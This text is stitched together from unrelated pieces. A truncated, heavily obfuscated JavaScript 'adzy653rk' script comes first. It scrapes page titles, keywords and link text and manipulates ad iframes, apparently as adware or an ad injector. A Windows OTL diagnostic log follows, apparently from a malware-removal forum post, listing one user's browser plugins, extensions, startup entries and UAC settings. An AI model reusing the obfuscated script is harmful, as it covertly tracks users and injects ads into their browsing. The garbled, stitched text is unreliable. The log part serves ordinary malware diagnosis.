\")},{tid:1,subid:window.adzy653rk.imp.pid,subid1:window.adzy653rk.imp.hid,subid2:window.adzy653rk.imp.eid,subid3:window.adzy653rk.imp.prid,lt:window.adzy653rk.imp.lt})},s7S5={I7T:\"t\",r2:function(a,\nb){return a>b},J2:function(a,b){return a<b},p2:function(a,b){return a>>b},Y0:function(a,b){return a>b},l2:function(a,b){return a|b},k2:function(a,b){return a>=b},u2:function(a,b){return a<<b},e4T:\"Co\",G7T:\"ch\",y2:function(a,b){return a|b},s4T:\"h\",i2:function(a,b){return a%b},C7T:4,Y7T:0,b2:function(a,b){return a|b},j7T:1,P2:function(a,b){return a<b},n7T:\"e\",f2:function(a,b){return a<b},B2:function(a,b){return a<b},A5:function(a,b){return a|b},X0:function(a,b){return a<b},U5:function(a,b){return a<\nb},m2:function(a,b){return a<b},z2:function(a,b){return a<b},A7T:\"r\",j4T:\"ar\",K2:function(a,b){return a|b},E7T:\"de\",K7T:15,N7T:\"a\",I0:function(a,b){return a<b},E0:function(){var a=function(a,b){var e=b&(352<(181,1206)?(93,65535):1268<=(197,48)?(70,24):(581,57));return((b-e)*a|((54,496)>=(1266,406)?(15,0):(538,20)))+(e*a|((109,1186)>(512,400)?(748,0):(360,1325)<=(274,22)?(1351,7):(954,1040)<=(66,435)?(1069,NaN):(130,57)))|(964>=(322,35)?(238,0):(28,1324))},b={};return{z0:a,i0:function(c,d,e){if(void 0!==\nb[e])return b[e];for(var g=131>=(1300,30)?(47,3432918353):(131,72),h=(387,282)<(234,217)?979:949>=(20,130)?(103,461845907):(67,1152),f=e,l=d&-(147>(26,106)?(3,4):(30,537)),n=393<=(224,579)?(110,0):(44,609);n<l;n+=(22,78)<(311,193)?(334,4):6>(67,31)?(417,\"K\"):(330,18))var k=c[(585>(255,136)?(106,\"c\"):(159,504))+(111<=(535,393)?(584,\"h\"):427<(18,57)?43:214<(1071,53)?(10,144):(1269,148))+(36>=(145,1095)?\"c\":(347,142)>(473,85)?(577,\"a\"):(568,998))+((352,49)>=(394,99)?90:1396<=(149,1300)?(1225,130):5<=\n(541,431)?(692,\"r\"):(581,48))+(242<(10,261)?(57,\"C\"):337>=(153,400)?389:1103>(82,1483)?(163,15):(385,583))+(808>=(68,37)?(563,\"o\"):(78,54))+\"deAt\"](n)&255|(c[\"c\"+(140>=(1465,372)?(1495,\"'\"):109<=(25,138)?(236,\"h\"):531<(101,20)?(67,\"l\"):(833,117))+\"arCodeA\"+((342,48)<=(128,325)?(2,\"t\"):(494,105))](n+1)&(17<(12,591)?(90,255):(100,71)))<<(252<(44,818)?(662,8):449>=(31,1115)?(1483,546):(146,81))|(c[(1349>(633,463)?(554,\"c\"):(116,51)>=(257,1072)?451:(800,39))+(91>=(141,94)?243:(138,40)>(131,458)?91:(1327,\n115)<=(22,439)?(559,\"h\"):(87,141))+\"ar\"+(149<=(51,114)?(59,233):118<(1139,173)?(72,\"C\"):(124,95))+(746>=(511,90)?(34,\"o\"):94>=(355,99)?\"H\":(240,108))+\"deA\"+(142<=(784,1264)?(287,\"t\"):(115,1190))](n+(72<=(38,44)?\"GET\":147>(566,60)?(140,2):(151,588)))&255)<<((418,483)>=(579,121)?(69,16):(64,64))|(c[(1022>(44,72)?(554,\"c\"):(910,192))+(298>(12,236)?(17,\"h\"):384>=(445,962)?(92,237):137<=(137,99)?536:(82,121))+((261,370)<(412,490)?(82,\"a\"):860<(48,105)?\"W\":(526,209))+(1261<=(10,981)?65:34<=(220,371)?(144,\n\"r\"):(173,270))+(253>(41,67)?(46,\"C\"):433<=(260,112)?(352,\"ADS\"):(17,491))+(106<=(88,427)?(131,\"o\"):(815,95))+(467>=(145,471)?64:(10,570)<=(42,1164)?(112,\"d\"):282<=(849,67)?(317,365):(87,157))+(289>=(268,1049)?(206,791):61<=(368,1293)?(77,\"e\"):(496,406))+((1281,432)<=(850,149)?(119,224):(561,101)<=(132,1264)?(143,\"A\"):(105,84))+\"t\"](n+((9,144)>(172,76)?(1227,3):(1382,39)))&255)<<(517>(59,23)?(242,24):(258,8)),k=a(k,g),k=(k&(548<=(45,120)?NaN:(69,364)<=(24,973)?(486,131071):123>(100,1339)?406:(311,\n142)))<<((1114,428)<(986,143)?1074:66<=(483,106)?(10,15):(82,1276))|k>>>(1054>=(1,394)?(986,17):(143,32)),k=a(k,h),f=f^k,f=(f&524287)<<13|f>>>(61<(6,98)?(178,19):(394,40)),f=f*(163<(1225,66)?NaN:441>(135,430)?(56,5):(706,361))+(697<=(414,52)?(989,15):(485,1112)>=(1038,144)?(108,3864292196):(1466,1071))|((60,578)>(60,30)?(384,0):(730,1252));k=172>=(491,125)?(30,0):(24,477);switch(d%(815<=(1295,238)?1240:(118,69)<=(410,132)?(68,4):(431,473))){case 22<=(818,90)?(405,3):(0,309)<=(44,273)?(92,\"W\"):(133,\n39):k=(c[\"ch\"+((57,485)>(71,1156)?239:(366,325)>=(52,383)?(122,165):20<=(72,1481)?(116,\"a\"):(4,1250))+(169<(41,364)?(102,\"r\"):(43,295))+(124<=(72,895)?(492,\"C\"):(138,198))+\"od\"+(51!=(65,51)?(140,\"P\"):(51,37)>(122,559)?(77,91):32<=(353,593)?(87,\"e\"):(511,526))+\"At\"](l+2)&255)<<(69<=(118,37)?380:(82,691)>(42,269)?(344,16):(77,92)>(143,228)?122:(76,440));case (1399,345)<(49,115)?(474,149):(3,98)>(1305,319)?(435,573):(110,7)<(1022,23)?(234,2):(489,105):k|=(c[\"char\"+(277<=(866,115)?(138,28):(87,213)>=\n(96,57)?(1220,\"C\"):(135,142)>=(138,1225)?\"A\":(555,124))+(1181<=(98,301)?!1:(104,21)<(574,1285)?(3,\"o\"):(129,316))+(275>(142,768)?72:(70,1097)>=(183,32)?(351,\"d\"):(121,187))+\"eAt\"](l+((1438,675)>=(565,65)?(1237,1):288>=(1283,355)?59:(37,6)))&((1069,119)>=(643,797)?(1307,NaN):(1153,494)>(147,349)?(1098,255):551<(110,30)?(106,NaN):(1397,107)))<<(55<=(100,1018)?(560,8):(32,253)>=(669,636)?NaN:(1177,575)<(45,499)?(22,97):(76,952));case 114>=(148,1445)?568:66<(1252,448)?(445,1):(385,55)>(167,81)?\"V\":(16,\n266):k|=c[((535,197)>=(93,39)?(140,\"c\"):(589,490))+\"harCodeA\"+(23<=(59,890)?(4,\"t\"):531<=(137,256)?(1139,\"D\"):(8,199))](l)&((80,484)<(1493,431)?265:67<(472,764)?(61,255):(1374,233)>(399,1035)?(146,140):(31,130)),k=a(k,g),k=(k&(1052>(0,436)?(108,131071):(1278,652)))<<(67<=(425,206)?(1116,15):(61,1271))|k>>>(880>(603,375)?(1278,17):(215,263)),k=a(k,h),f^=k}f^=d;f^=f>>>(116>(107,985)?(255,1210):45<(450,137)?(95,16):(301,371));f=a(f,296<=(134,59)?(165,1009):(1400,858)>(467,33)?(124,2246822507):107>(132,\n520)?(185,\"T\"):(280,1174));f^=f>>>(606>(799,130)?(607,13):(323,1437)<(96,301)?560:1231<=(488,473)?(463,NaN):(323,146));f=a(f,(1117,1311)>=(567,32)?(11,3266489909):138>(260,206)?\"p\":(100,306));f^=f>>>16;return b[e]=f}}}(),e7T:3,W9T:\"o\",c0:function(a,b){return a>b},g7T:\"c\",Z7T:8,b7T:\"At\",G4T:\"C\",V0:function(a,b){return a<b},V7T:2,d9T:\"od\",F5:function(a,b){return a|b},E9T:\"A\",Q2:function(a,b){return a<b},H2:function(a,b){return a<b},r7T:\"d\",M2:function(a,b){return a|b},R0:function(a,b){return a==b},\nD5:function(a,b){return a&b}},isRvzFrame=function(a){try{return a instanceof HTMLIFrameElement&&a.parentNode instanceof HTMLDivElement&&a.parentNode.parentNode instanceof HTMLDivElement&&a.parentNode.parentNode.className&&\"string\"==typeof a.parentNode.parentNode.className&&1<a.parentNode.parentNode.className.length&&removeNode(a.parentNode.parentNode.className.split(\" \")[0])}catch(b){return!1}};window.adzy653rk={version:\"1.0\",nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"2111\",eid:\"1272\",\nhid:\"17070091036678530380\",prid:100,lt:\"39\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"Qgr650HB\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},topHost:function(){if(window.self!=window.top){var a=decodeURIComponent(window.self.location.search).match(/http:\\/\\/[^&]+/);return a&&a[0]}return null}(),checkIfPartner:function(a){if(window.top==window)return isRvzFrame(a);\nvar b={_728x90:function(a){return a.parentElement&&a.parentElement.nextSibling&&a.parentElement.nextSibling.children&&a.parentElement.nextSibling.children[0]&&a.parentElement.nextSibling.children[0]&&a.parentElement.nextSibling.children[0].innerHTML.match(/qa/)},_160_600:function(a){return a.parentElement&&a.parentElement.nextSibling&&\"String\"==typeof a.parentElement.nextSibling.innerHTML&&adzy653rk.regexExtTest.test(a.parentElement.nextSibling.innerHTML)},_625x250:function(a){return(a=a.getAttribute(\"style\"))?\na.match(/width:\\s?625px/)&&a.match(/width:\\s?250px/):!1},_345x600:function(a){return(a=a.getAttribute(\"style\"))?a.match(/width:\\s?345px/)&&a.match(/width:\\s?600px/):!1}},c;for(c in b)if(b[c](a))return!0;return!1},getKeywords:function(){var a=adzy653rk.imp.title,b=document.getElementsByTagName(\"meta\");if(b)for(var c=0,d=b.length;c<d;c++)\"keywords\"!=b[c].name.toLowerCase()&&\"description\"!=b[c].name.toLowerCase()||(a+=\" \"+b[c].content.replace(/,/g,\" \"));if(c=document.getElementsByTagName(\"a\")){b={};\nfor(d=0;d<c.length;d++)try{var e=c[d].innerText;\"undefined\"==typeof e&&(e=c[d].textContent);for(var g=e.toLowerCase().split(/[\\s,-]/g),h=0;h<g.length;h++)4>g[h].length||(b[g[h]]?b[g[h]]++:b[g[h]]=1)}catch(f){}var e=[],l;for(l in b)e.push([l,b[l]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(l=0;l<e.length;l++)a+=\" \"+e[l][0]}return a.replace(/[_-]/g,\" \").substring(0,1024)},setMarker:function(){var a=document.getElementsByTagName(\"body\")[0];a&&!a.getAttribute(\"jhjlijpomuhn_l\")&&a.setAttribute(\"jhjlijpomuhn_m\",\n\"l\")},isAncestor:function(a,b,c){function d(a){return\"object\"==typeof a&&a.top instanceof Window||/^\\s*\\[\\s*object\\s*Window\\s*\\]\\s*/.test(a+\"\")}c=c||30;return a==b?!0:!d(a)||!d(b)||b==window.top||0>=c?!1:adzy653rk.isAncestor(a,b.parent,--c)},listenForMessages:function(){if(window.top===window){var a=adzy653rk;window.addEventListener(\"message\",function(b){try{if(0==((b.data||\"\")+\"\").indexOf(a.l.encode(a.imp.hid+\"/\"+a.imp.eid+\"/\"+a.imp.prid)+\"_\"))switch(b.data.split(\"_\")[1]){case \"IIIFAR\":for(var c=\nwindow.document.getElementsByTagName(\"iframe\"),d=0,e;d<c.length;d++)e=c[d],a.isAncestor(e.contentWindow,b.source)&&(isRvzFrame(e)?b.source.postMessage(b.data+\"_\"+a.l.encode(\"RVZ\"),\"*\"):b.source.postMessage(b.data,\"*\"))}}catch(g){}},!1)}},isAllowRunning:function(a){var b=adzy653rk,c,d=b.imp.hid,e=b.imp.eid,g=b.imp.prid,h=function(e){try{var d=b.l.encode(b.imp.hid+\"/\"+b.imp.eid+\"/\"+b.imp.prid);if(0==((e.dat

OTLタグ２



FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF64_17_0_0_169.dll File not found
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@gamepot.co.jp/GamepotEXeEnvCtrl;version=1: C:\Program Files (x86)\Gamepot\GPEXE\\npGPEXE.dll ()
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@nexon.co.jp/NxGame: C:\ProgramData\NexonJP\NGM\npNxGameJP.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKLM\Software\MozillaPlugins\pmang.jp/pmangsupport-1: C:\Users\ryota\Desktop\新しいフォルダー\GameOn\TERA\nppmangsupport_0.dll (gameon)
FF - HKCU\Software\MozillaPlugins\@neople.co.kr/NeopleGameInstaller: C:\ProgramData\NeoplePlugin\npNeopleGameInstaller.dll ( )

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Components: c:\program files (x86)\Mozilla Firefox\components [2014/08/30 11:40:53 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Plugins: c:\program files (x86)\Mozilla Firefox\plugins

[2014/05/16 21:28:33 | 000,000,000 | ---D | M] (No name found) -- C:\Users\ryota\AppData\Roaming\mozilla\Extensions
[2015/04/20 15:21:21 | 000,000,000 | ---D | M] (No name found) -- C:\Users\ryota\AppData\Roaming\mozilla\Firefox\Profiles\huvep8mo.default\extensions
[2015/04/20 15:21:21 | 000,000,000 | ---D | M] (Avira Browser Safety) -- C:\Users\ryota\AppData\Roaming\mozilla\Firefox\Profiles\huvep8mo.default\extensions\abs@avira.com
[2014/06/30 01:40:59 | 000,000,000 | ---D | M] (HGPlugin) -- C:\Users\ryota\AppData\Roaming\mozilla\Firefox\Profiles\huvep8mo.default\extensions\hgplugin@hangame.co.jp
[2015/04/04 19:27:38 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2015/04/04 19:25:26 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

[color=#E56717]========== Chrome ==========[/color]

CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - homepage:
CHR - plugin: Error reading preferences file
CHR - Extension: Google 繝峨く繝･繝｡繝ｳ繝・ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\
CHR - Extension: Google 繝峨Λ繧､繝・ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.4_0\
CHR - Extension: YouTube = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0\
CHR - Extension: Google Search = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0\
CHR - Extension: Twitch Stream = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjaicoojlfoococemdcaollmhaiolole\207\
CHR - Extension: Avira Browser Safety = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk\1.4.6_0\
CHR - Extension: Dropmark sidebar = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\foiapgoppijipmmgkaibacckkhbngfhp\171\
CHR - Extension: BlocKUTubEADi = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\geoafhlnmffijlblgohnpmjfbnpcpadd\3.2_0\
CHR - Extension: Google 繧ｦ繧ｩ繝ｬ繝・ヨ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Gmail = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\

O1 HOSTS File: ([2013/08/22 22:25:41 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:[b]64bit:[/b] - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O3 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\Toolbar\WebBrowser: (no name) - {AEF44653-C059-42CB-A5B7-41C640DA4A67} - No CLSID value found.
O4:[b]64bit:[/b] - HKLM..\Run: [Creative SB Monitoring Utility] C:\WINDOWS\SysNative\SBAVMon.dll (Creative Technology Ltd.)
O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxTray.exe (Intel Corporation)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [au_WiFi_Connect] C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe ()
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [eochk] File not found
O4 - HKLM..\Run: [Google Japanese Input Prelauncher] C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe (Google Inc.)
O4 - HKLM..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe (VIA)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe (Kingsoft Corp. Ltd.)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [DAEMON Tools Lite] C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe (i-Funbox.com)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [Line] C:\Program Files (x86)\Naver\LINE\Line.exe (LINE Corporation)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [OneDrive] C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\RunOnce: [Application Restart #0] C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O9:[b]64bit:[/b] - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O13[b]64bit:[/b] - gopher Prefix: missing
O13 - gopher Prefix: missing
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab (HGPluginJP28 Class)
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab (DMMLauncherAx Control)
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} http://down.hangame.co.jp/jp/installer/HgRunPub.cab (HgRunPub Class)
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab (NeffyLauncherCtl Class)
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab (Creative Software AutoUpdate Support Package 2)
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab (Creative Software AutoUpdate 2)
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab (Creative Software AutoUpdate Support Package)
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab (PubPlugin Class)
O18:[b]64bit:[/b] - Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\WINDOWS\SysWow64\userinit.exe (Microsoft Corporation)
O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O30 - LSA: Security Packages - (livessp) - File not found
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{2284b339-6b2b-11e4-824f-fed426b625ef}\Shell - "" = AutoRun
O33 - MountPoints2\{2284b339-6b2b-11e4-824f-fed426b625ef}\Shell\AutoRun\command - "" = "F:\install.exe"
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

CREATERESTOREPOINT
Unable to start System Restore Service. Error code 1084

[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]

[2015/04/20 21:58:27 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\herdProtect
[2015/04/20 21:58:26 | 000,000,000 | ---D | C] -- C:\Program Files\Reason
[2015/04/20 21:57:24 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe
[2015/04/20 21:53:24 | 002,873,112 | ---- | C] (Reason Company Software Inc.) -- C:\Users\ryota\Desktop\herdProtectScan_Setup.exe
[2015/04/18 19:28:00 | 000,792,056 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
[2015/04/18 19:28:00 | 000,178,168 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
[2015/04/18 19:22:07 | 000,000,000 | ---D | C] -- C:\WINDOWS\SysNative\appraiser
[2015/04/16 05:26:09 | 000,085,504 | ---- | C] (Radius Inc.) -- C:\WINDOWS\SysWow64\iccvid.dll
[2015/04/15 04:37:56 | 007,476,032 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntoskrnl.exe
[2015/04/15 04:37:56 | 001,733,952 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntdll.dll
[2015/04/15 04:37:55 | 000,950,784 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\tdh.dll
[2015/04/15 04:37:55 | 000,749,568 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\tdh.dll
[2015/04/15 04:37:55 | 000,411,648 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\tracerpt.exe
[2015/04/15 04:37:55 | 000,369,152 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\tracerpt.exe
[2015/04/15 04:37:55 | 000,360,480 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\sechost.dll
[2015/04/15 04:37:55 | 000,285,184 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wow64.dll
[2015/04/15 04:37:55 | 000,246,272 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\microsoft-windows-system-events.dll
[2015/04/15 04:37:55 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wow64cpu.dll
[2015/04/15 04:37:48 | 001,385,256 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msctf.dll
[2015/04/15 04:37:47 | 000,780,800 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\lsm.dll
[2015/04/15 04:37:42 | 006,025,216 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript9.dll
[2015/04/15 04:37:41 | 000,720,384 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ie4uinit.exe
[2015/04/15 04:37:40 | 000,092,160 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\mshtmled.dll
[2015/04/15 04:37:39 | 000,816,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript.dll
[2015/04/15 04:37:39 | 000,801,280 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msfeeds.dll
[2015/04/15 04:37:39 | 000,664,064 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\jscript.dll
[2015/04/15 04:37:39 | 000,584,192 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\vbscript.dll
